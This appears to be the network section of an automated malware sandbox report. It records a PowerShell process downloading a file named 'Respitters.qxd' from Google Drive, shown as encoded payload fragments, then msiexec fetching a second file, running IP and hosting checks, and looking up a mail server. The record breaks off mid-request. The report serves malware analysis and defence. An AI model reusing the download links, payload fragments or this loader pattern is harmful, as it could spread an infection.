                                                      Oct 24, 2024 08:46:11.454302073 CEST1.1.1.1192.168.2.50xe740No error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:46:12.742027044 CEST1.1.1.1192.168.2.50x58d8No error (0)drive.usercontent.google.com142.250.186.65A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:02.977385998 CEST1.1.1.1192.168.2.50x5683No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:02.977385998 CEST1.1.1.1192.168.2.50x5683No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:02.977385998 CEST1.1.1.1192.168.2.50x5683No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:03.809942007 CEST1.1.1.1192.168.2.50xb78aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:08.875303984 CEST1.1.1.1192.168.2.50x59aNo error (0)mail.ihcm.com.my202.71.109.165A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:08.875325918 CEST1.1.1.1192.168.2.50x59aNo error (0)mail.ihcm.com.my202.71.109.165A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:08.875339031 CEST1.1.1.1192.168.2.50x59aNo error (0)mail.ihcm.com.my202.71.109.165A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • drive.google.com
                                                      • drive.usercontent.google.com
                                                      • api.ipify.org
                                                      • ip-api.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549909208.95.112.1803116C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 08:47:03.815913916 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                      Host: ip-api.com
                                                      Connection: Keep-Alive
                                                      Oct 24, 2024 08:47:04.423789024 CEST174INHTTP/1.1 200 OK
                                                      Date: Thu, 24 Oct 2024 06:47:03 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 5
                                                      Access-Control-Allow-Origin: *
                                                      X-Ttl: 60
                                                      X-Rl: 44
                                                      Data Raw: 74 72 75 65 0a
                                                      Data Ascii: true


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549704142.250.185.2384436800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:46:12 UTC215OUTGET /uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-24 06:46:12 UTC1610INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 24 Oct 2024 06:46:12 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-4Oelr0dkq4zYyP2ZNadVUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549705142.250.185.2384436800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:46:17 UTC121OUTGET /uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy HTTP/1.1
                                                      Host: drive.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-24 06:46:18 UTC1319INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 24 Oct 2024 06:46:18 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0b3WH461-_DS16p9W4dCaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.549706142.250.186.654436800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:46:19 UTC139OUTGET /download?id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy&export=download HTTP/1.1
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-24 06:46:22 UTC4916INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="Respitters.qxd"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 482352
                                                      Last-Modified: Thu, 24 Oct 2024 00:20:31 GMT
                                                      X-GUploader-UploadID: AHmUCY2Hr48PAr2sdm2_NK1AIGpxyQ_vuNsIP09ezJD9LqFcZ8iyfharw5HEJfEeY-oeoTXPuqT-PdTuTg
                                                      Date: Thu, 24 Oct 2024 06:46:22 GMT
                                                      Expires: Thu, 24 Oct 2024 06:46:22 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=5jtc6g==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2024-10-24 06:46:22 UTC4916INData Raw: 63 51 47 62 63 51 47 62 75 39 70 51 47 51 44 72 41 6d 6a 48 63 51 47 62 41 31 77 6b 42 48 45 42 6d 33 45 42 6d 37 6d 65 6d 44 67 47 36 77 4a 50 76 6e 45 42 6d 34 48 78 70 79 72 72 55 6e 45 42 6d 2b 73 43 41 67 65 42 36 54 6d 79 30 31 52 78 41 5a 76 72 41 76 4f 41 63 51 47 62 63 51 47 62 75 76 38 66 5a 6e 62 72 41 70 69 56 63 51 47 62 36 77 49 6c 71 75 73 43 34 68 73 78 79 75 73 43 65 75 5a 78 41 5a 75 4a 46 41 74 78 41 5a 76 72 41 6c 6f 67 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 72 63 62 67 66 6e 6d 6b 55 4d 45 66 4d 76 72 41 6a 48 52 36 77 4c 64 68 6f 74 45 4a 41 54 72 41 6f 76 54 63 51 47 62 69 63 50 72 41 6e 6c 74 36 77 49 79 63 49 48 44 34 76 39 37 41 33 45 42 6d 2b 73 43 49 68 61 36 74 39 61 57 54 4f 73 43 46 36 78 78 41 5a 75
                                                      Data Ascii: cQGbcQGbu9pQGQDrAmjHcQGbA1wkBHEBm3EBm7memDgG6wJPvnEBm4HxpyrrUnEBm+sCAgeB6Tmy01RxAZvrAvOAcQGbcQGbuv8fZnbrApiVcQGb6wIlqusC4hsxyusCeuZxAZuJFAtxAZvrAlog0eJxAZtxAZuDwQRxAZvrArcbgfnmkUMEfMvrAjHR6wLdhotEJATrAovTcQGbicPrAnlt6wIycIHD4v97A3EBm+sCIha6t9aWTOsCF6xxAZu
                                                      2024-10-24 06:46:22 UTC4866INData Raw: 66 79 62 78 52 34 72 41 44 56 43 58 61 4d 4a 57 39 48 34 63 30 46 74 54 6d 4f 43 55 55 6a 5a 54 57 51 70 39 6f 71 71 6f 6e 38 49 69 64 79 38 44 4c 57 6e 62 4a 43 70 4e 6b 32 39 74 75 5a 72 6b 2f 4f 34 61 49 76 67 46 78 62 74 73 6f 70 49 38 32 53 6e 66 68 32 56 76 44 49 63 4d 68 48 47 47 52 62 6f 6a 32 53 77 50 41 71 62 52 34 66 66 6e 56 34 71 32 42 44 6f 5a 71 45 71 37 53 2b 34 70 41 49 6c 32 33 4c 6c 70 73 58 42 70 72 5a 6f 54 58 61 41 51 69 44 78 33 4e 77 4f 37 73 36 71 35 45 63 79 5a 6e 36 65 65 38 72 5a 32 6d 6b 71 65 7a 33 36 57 6c 50 67 33 79 4c 34 74 73 35 72 6d 44 69 67 47 49 43 70 71 6b 73 52 34 2f 59 5a 42 51 44 42 6c 4f 57 41 6f 2b 36 6f 72 59 31 52 77 38 51 46 33 54 37 37 74 32 55 70 76 75 74 6f 30 4d 71 72 49 71 51 78 49 4e 51 30 58 68 2f 6a
                                                      Data Ascii: fybxR4rADVCXaMJW9H4c0FtTmOCUUjZTWQp9oqqon8Iidy8DLWnbJCpNk29tuZrk/O4aIvgFxbtsopI82Snfh2VvDIcMhHGGRboj2SwPAqbR4ffnV4q2BDoZqEq7S+4pAIl23LlpsXBprZoTXaAQiDx3NwO7s6q5EcyZn6ee8rZ2mkqez36WlPg3yL4ts5rmDigGICpqksR4/YZBQDBlOWAo+6orY1Rw8QF3T77t2Upvuto0MqrIqQxINQ0Xh/j
                                                      2024-10-24 06:46:22 UTC1323INData Raw: 49 71 39 62 58 4f 56 57 36 4d 34 69 4e 52 4e 34 4b 47 34 2b 4b 51 37 32 67 76 36 32 54 4e 78 58 77 49 54 56 67 79 6a 49 64 47 31 68 72 5a 55 56 62 71 4c 72 4a 2f 39 69 41 42 33 36 70 66 2b 41 56 78 4d 43 6e 63 53 5a 32 56 64 37 6c 64 2b 41 54 6e 4b 41 58 69 6d 74 57 30 35 52 47 4b 2b 41 54 47 75 36 30 31 53 72 76 77 46 78 49 32 35 48 50 6b 57 58 64 54 79 61 69 62 45 65 73 65 4e 74 51 64 42 47 52 46 74 50 2f 42 63 36 5a 59 47 65 69 52 6e 39 76 50 47 64 56 58 53 66 44 5a 31 73 37 39 66 76 30 2b 51 58 58 44 32 5a 73 74 70 33 66 5a 47 6f 74 75 49 36 61 4c 6d 6d 69 45 62 36 65 48 72 70 6a 2f 43 72 70 42 50 6d 55 2f 34 44 35 73 79 51 6c 34 53 76 52 70 68 46 55 64 51 45 75 7a 75 55 35 4e 65 70 61 71 32 48 64 48 38 36 69 2f 47 6f 66 43 4e 63 5a 46 63 35 69 37 6d
                                                      Data Ascii: Iq9bXOVW6M4iNRN4KG4+KQ72gv62TNxXwITVgyjIdG1hrZUVbqLrJ/9iAB36pf+AVxMCncSZ2Vd7ld+ATnKAXimtW05RGK+ATGu601SrvwFxI25HPkWXdTyaibEeseNtQdBGRFtP/Bc6ZYGeiRn9vPGdVXSfDZ1s79fv0+QXXD2Zstp3fZGotuI6aLmmiEb6eHrpj/CrpBPmU/4D5syQl4SvRphFUdQEuzuU5Nepaq2HdH86i/GofCNcZFc5i7m
                                                      2024-10-24 06:46:22 UTC1378INData Raw: 6e 44 4b 69 70 6c 62 4c 4c 65 68 65 49 38 73 5a 69 46 4e 55 37 74 59 59 5a 7a 62 66 5a 56 61 31 50 42 34 56 49 45 37 6b 75 64 66 30 5a 74 72 6c 38 4f 33 4f 2b 78 45 36 78 72 76 6d 50 72 54 33 77 77 62 79 56 75 46 67 32 78 78 2b 6a 43 50 34 35 53 76 6a 68 6c 54 63 75 42 33 6f 58 46 61 38 46 59 62 7a 67 65 31 4f 6a 4a 52 71 6f 31 45 46 48 76 67 63 48 57 61 79 4c 68 31 68 6e 30 70 54 72 49 33 71 63 73 75 4d 51 52 51 71 77 72 64 36 6b 79 49 54 44 4f 45 46 69 76 7a 4f 52 57 6f 68 55 79 37 38 42 45 53 49 4f 52 79 30 46 78 78 44 35 61 72 67 43 6c 7a 67 45 71 72 43 52 44 56 68 52 68 56 53 36 4d 6c 78 46 43 47 45 74 4b 34 2b 76 46 53 52 77 5a 6a 64 73 4f 78 75 72 32 6b 69 56 54 4d 4f 53 43 74 73 56 37 6f 34 53 38 4e 41 4e 77 6a 4a 70 41 69 37 43 47 68 6b 4a 70 32
                                                      Data Ascii: nDKiplbLLeheI8sZiFNU7tYYZzbfZVa1PB4VIE7kudf0Ztrl8O3O+xE6xrvmPrT3wwbyVuFg2xx+jCP45SvjhlTcuB3oXFa8FYbzge1OjJRqo1EFHvgcHWayLh1hn0pTrI3qcsuMQRQqwrd6kyITDOEFivzORWohUy78BESIORy0FxxD5argClzgEqrCRDVhRhVS6MlxFCGEtK4+vFSRwZjdsOxur2kiVTMOSCtsV7o4S8NANwjJpAi7CGhkJp2
                                                      2024-10-24 06:46:22 UTC1378INData Raw: 32 63 57 47 58 6c 63 44 54 37 35 35 56 6e 68 72 43 48 5a 56 68 46 69 77 42 4d 74 34 71 50 41 49 71 42 79 49 45 42 78 6f 4d 4d 51 66 35 49 30 32 72 64 45 43 4f 76 49 6d 4f 51 71 5a 39 30 6a 50 79 6f 7a 4a 4b 6e 6d 56 62 54 49 33 34 48 7a 41 77 78 75 53 61 31 68 6e 75 67 37 44 77 78 79 58 6d 71 36 73 49 74 55 6d 51 2f 47 59 32 6d 34 33 37 47 4d 6b 43 39 36 4c 79 76 43 72 69 74 71 45 77 41 4e 31 61 56 6f 51 4f 74 56 39 65 47 6c 56 2b 74 53 2b 6a 6c 73 69 35 6a 6a 44 75 48 68 67 78 64 58 64 38 6d 30 65 59 55 4f 4e 61 78 31 6a 32 7a 4b 68 52 36 46 72 56 39 78 2f 39 42 35 4d 42 78 31 43 45 70 6e 39 4e 44 4f 77 4e 63 33 37 59 7a 4c 59 61 4a 33 6b 65 52 2f 4e 39 39 6b 6d 64 36 7a 74 49 4e 76 67 45 61 34 75 54 63 35 72 6c 6e 39 76 36 33 76 67 30 43 57 6c 59 79 70
                                                      Data Ascii: 2cWGXlcDT755VnhrCHZVhFiwBMt4qPAIqByIEBxoMMQf5I02rdECOvImOQqZ90jPyozJKnmVbTI34HzAwxuSa1hnug7DwxyXmq6sItUmQ/GY2m437GMkC96LyvCritqEwAN1aVoQOtV9eGlV+tS+jlsi5jjDuHhgxdXd8m0eYUONax1j2zKhR6FrV9x/9B5MBx1CEpn9NDOwNc37YzLYaJ3keR/N99kmd6ztINvgEa4uTc5rln9v63vg0CWlYyp
                                                      2024-10-24 06:46:22 UTC1378INData Raw: 58 66 71 39 75 36 4c 31 71 61 49 2f 4c 48 30 36 58 66 61 61 68 38 6d 63 61 35 67 64 67 32 4a 35 57 57 69 31 2b 4f 6a 4e 46 6a 79 73 39 64 36 2b 51 64 77 52 71 79 30 67 77 42 68 6a 65 65 32 58 47 57 34 38 32 50 65 32 48 56 39 6d 79 58 69 49 42 36 43 75 33 33 32 6b 71 4a 46 39 78 73 6e 4b 6b 31 77 66 55 4e 30 6d 74 54 76 33 66 6e 71 2b 44 58 76 6d 6e 74 43 6d 75 52 32 4a 7a 2f 62 4c 6d 71 53 77 48 6a 70 68 71 4b 4b 68 42 33 52 68 43 32 51 5a 68 4b 32 6e 43 4a 51 55 2b 32 48 67 47 6e 37 6c 74 4e 76 4d 38 2b 6f 72 52 47 56 42 2f 63 31 77 73 75 52 64 71 59 45 76 69 37 69 65 66 59 55 6f 34 6f 47 47 69 63 6d 7a 75 39 38 4b 55 35 73 76 4e 70 4e 4c 69 33 79 4e 6a 34 69 2b 67 61 48 52 69 39 71 6b 73 46 34 38 49 61 6a 6f 6f 73 50 73 2f 70 43 4f 64 6e 77 39 6b 39 6f
                                                      Data Ascii: Xfq9u6L1qaI/LH06Xfaah8mca5gdg2J5WWi1+OjNFjys9d6+QdwRqy0gwBhjee2XGW482Pe2HV9myXiIB6Cu332kqJF9xsnKk1wfUN0mtTv3fnq+DXvmntCmuR2Jz/bLmqSwHjphqKKhB3RhC2QZhK2nCJQU+2HgGn7ltNvM8+orRGVB/c1wsuRdqYEvi7iefYUo4oGGicmzu98KU5svNpNLi3yNj4i+gaHRi9qksF48IajoosPs/pCOdnw9k9o
                                                      2024-10-24 06:46:22 UTC1378INData Raw: 4b 58 6e 66 69 36 2f 64 65 56 71 47 78 65 64 57 5a 5a 68 6f 4b 78 6d 43 38 2f 78 64 37 5a 73 6f 49 78 54 63 6e 66 39 41 5a 4f 6c 52 56 2f 33 35 58 78 33 63 48 43 66 76 34 38 6a 39 79 62 39 33 69 70 6c 58 53 6a 6b 4e 74 2f 48 4e 43 4e 6f 64 31 51 58 59 78 4c 43 64 35 39 68 73 6e 65 66 59 62 4a 33 6e 32 47 79 64 35 39 68 73 6e 65 66 59 62 4a 33 6e 32 47 79 64 61 37 6a 66 63 53 79 76 49 6d 4e 30 37 35 39 36 57 69 73 41 32 2b 6c 43 61 43 31 32 62 65 57 55 36 2b 52 72 6a 39 76 59 62 4a 33 6e 32 47 79 64 35 39 68 73 6e 65 66 59 62 4a 33 6e 32 47 79 64 35 39 68 73 6e 65 66 59 36 33 55 74 59 6d 4a 56 7a 46 4b 52 30 33 59 36 4c 6b 39 65 4f 6d 68 4e 64 68 6b 7a 6f 79 4b 57 67 67 4c 37 7a 57 36 61 53 6b 6a 42 47 63 6e 66 6f 5a 4f 52 53 4c 33 58 6c 66 2f 6b 75 59 32
                                                      Data Ascii: KXnfi6/deVqGxedWZZhoKxmC8/xd7ZsoIxTcnf9AZOlRV/35Xx3cHCfv48j9yb93iplXSjkNt/HNCNod1QXYxLCd59hsnefYbJ3n2Gyd59hsnefYbJ3n2Gyda7jfcSyvImN07596WisA2+lCaC12beWU6+Rrj9vYbJ3n2Gyd59hsnefYbJ3n2Gyd59hsnefY63UtYmJVzFKR03Y6Lk9eOmhNdhkzoyKWggL7zW6aSkjBGcnfoZORSL3Xlf/kuY2
                                                      2024-10-24 06:46:22 UTC1378INData Raw: 53 41 4a 79 33 2f 77 59 2f 55 6d 65 66 5a 4d 6d 4e 33 35 5a 53 62 34 41 66 69 37 4b 55 32 61 79 44 35 6b 4e 5a 30 72 61 70 4c 46 65 4d 79 47 51 66 77 70 62 41 51 41 4f 39 43 57 45 55 55 53 66 43 72 57 36 65 63 6d 72 4a 39 61 48 4e 6e 65 42 57 63 33 52 77 39 61 41 2b 51 44 78 73 57 58 49 76 36 2b 6d 61 55 48 6f 43 50 5a 49 38 2f 54 65 4d 4e 2b 36 76 31 72 4f 6d 78 75 61 6b 31 68 74 77 47 37 63 59 36 6e 57 42 77 76 66 36 52 73 39 4c 4f 6f 42 4f 63 4e 34 72 52 6f 4b 6c 6b 6e 34 53 4b 78 6c 39 75 51 32 38 43 54 46 6b 58 30 58 34 4d 73 56 73 52 70 64 2b 6c 36 6c 53 61 59 70 6f 75 32 4c 4f 74 67 70 71 4f 79 34 7a 66 42 45 6f 4c 2f 54 5a 35 38 69 75 65 61 64 66 4e 4f 47 74 4a 35 6b 69 2b 58 4b 2f 46 5a 30 38 46 79 33 71 75 71 4b 2b 37 4a 4a 6e 5a 6f 76 67 35 5a
                                                      Data Ascii: SAJy3/wY/UmefZMmN35ZSb4Afi7KU2ayD5kNZ0rapLFeMyGQfwpbAQAO9CWEUUSfCrW6ecmrJ9aHNneBWc3Rw9aA+QDxsWXIv6+maUHoCPZI8/TeMN+6v1rOmxuak1htwG7cY6nWBwvf6Rs9LOoBOcN4rRoKlkn4SKxl9uQ28CTFkX0X4MsVsRpd+l6lSaYpou2LOtgpqOy4zfBEoL/TZ58iueadfNOGtJ5ki+XK/FZ08Fy3quqK+7JJnZovg5Z
                                                      2024-10-24 06:46:22 UTC1378INData Raw: 6f 54 4a 68 74 69 78 73 49 2b 41 46 51 46 59 4b 63 6d 73 69 5a 43 4f 46 69 38 4d 45 57 31 2f 79 42 78 6a 50 78 48 72 6b 38 7a 49 57 71 37 46 51 31 31 39 52 56 6b 4e 31 4a 61 38 42 38 4e 77 6e 5a 2b 41 68 43 58 5a 70 34 54 44 58 69 43 73 65 6d 6f 34 57 4f 68 2b 30 53 6a 69 56 56 6d 55 79 6a 50 68 67 78 6f 49 65 75 6e 2f 38 64 75 68 2f 50 33 46 56 68 46 55 2b 71 54 2b 73 51 4b 51 43 30 2b 45 6e 44 44 51 42 42 70 6f 64 6b 66 49 49 79 4e 72 34 43 6b 63 56 6e 55 72 37 64 37 62 6b 53 34 49 68 69 74 70 37 76 4a 35 41 69 2f 79 48 7a 39 4e 52 54 5a 7a 5a 35 67 6c 63 62 35 58 48 32 54 5a 6b 55 4d 42 5a 79 2b 44 43 71 79 4c 6f 75 6d 75 47 73 39 32 76 49 2b 44 43 35 66 4e 67 6f 6d 75 45 53 47 77 63 6a 4b 6d 71 53 78 48 44 46 68 6b 46 41 4c 57 6f 30 76 4c 77 49 77 4a
                                                      Data Ascii: oTJhtixsI+AFQFYKcmsiZCOFi8MEW1/yBxjPxHrk8zIWq7FQ119RVkN1Ja8B8NwnZ+AhCXZp4TDXiCsemo4WOh+0SjiVVmUyjPhgxoIeun/8duh/P3FVhFU+qT+sQKQC0+EnDDQBBpodkfIIyNr4CkcVnUr7d7bkS4Ihitp7vJ5Ai/yHz9NRTZzZ5glcb5XH2TZkUMBZy+DCqyLoumuGs92vI+DC5fNgomuESGwcjKmqSxHDFhkFALWo0vLwIwJ
                                                      2024-10-24 06:46:22 UTC1378INData Raw: 6e 66 79 63 36 63 6d 65 66 61 53 73 72 72 33 47 79 66 44 69 32 53 59 73 71 47 6b 76 33 79 35 32 36 61 57 67 5a 77 33 62 6e 66 73 42 67 62 49 73 6e 66 6c 66 2f 73 75 51 57 75 66 37 51 50 64 6e 75 4b 53 6c 42 43 74 4b 6a 39 68 79 67 6d 55 30 58 34 75 4a 61 61 61 33 57 61 6f 53 74 4e 4d 65 74 36 2b 79 70 7a 4e 36 4f 2f 36 59 57 73 67 2f 64 50 4b 59 74 4e 69 34 69 68 71 2f 66 30 75 51 78 2b 6f 71 5a 72 6c 4a 6e 43 6a 4a 50 67 45 39 64 48 31 73 45 32 5a 43 5a 36 76 74 76 67 59 75 66 32 57 38 35 72 4a 74 33 72 66 72 43 70 71 6b 73 52 34 78 59 59 65 72 34 77 50 46 69 47 41 76 6b 41 6b 63 6b 72 55 67 46 71 6c 67 33 67 33 35 75 72 43 75 31 71 5a 62 6c 2b 55 75 6e 6a 76 4f 68 64 76 36 72 73 61 59 38 56 45 62 5a 49 48 49 6d 42 57 33 75 7a 6d 44 44 2b 50 49 53 4c 50
                                                      Data Ascii: nfyc6cmefaSsrr3GyfDi2SYsqGkv3y526aWgZw3bnfsBgbIsnflf/suQWuf7QPdnuKSlBCtKj9hygmU0X4uJaaa3WaoStNMet6+ypzN6O/6YWsg/dPKYtNi4ihq/f0uQx+oqZrlJnCjJPgE9dH1sE2ZCZ6vtvgYuf2W85rJt3rfrCpqksR4xYYer4wPFiGAvkAkckrUgFqlg3g35urCu1qZbl+UunjvOhdv6rsaY8VEbZIHImBW3uzmDD+PISLP


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.549875142.250.185.2384433116C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:46:58 UTC216OUTGET /uc?export=download&id=1m3Bn2eQH6bYOUTR9vsZueEzLbkmQowfA HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2024-10-24 06:46:58 UTC1610INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 24 Oct 2024 06:46:58 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1m3Bn2eQH6bYOUTR9vsZueEzLbkmQowfA&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-f0ma-TQU9vq2z5gdVO4hNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.549881142.250.186.654433116C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:46:59 UTC258OUTGET /download?id=1m3Bn2eQH6bYOUTR9vsZueEzLbkmQowfA&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
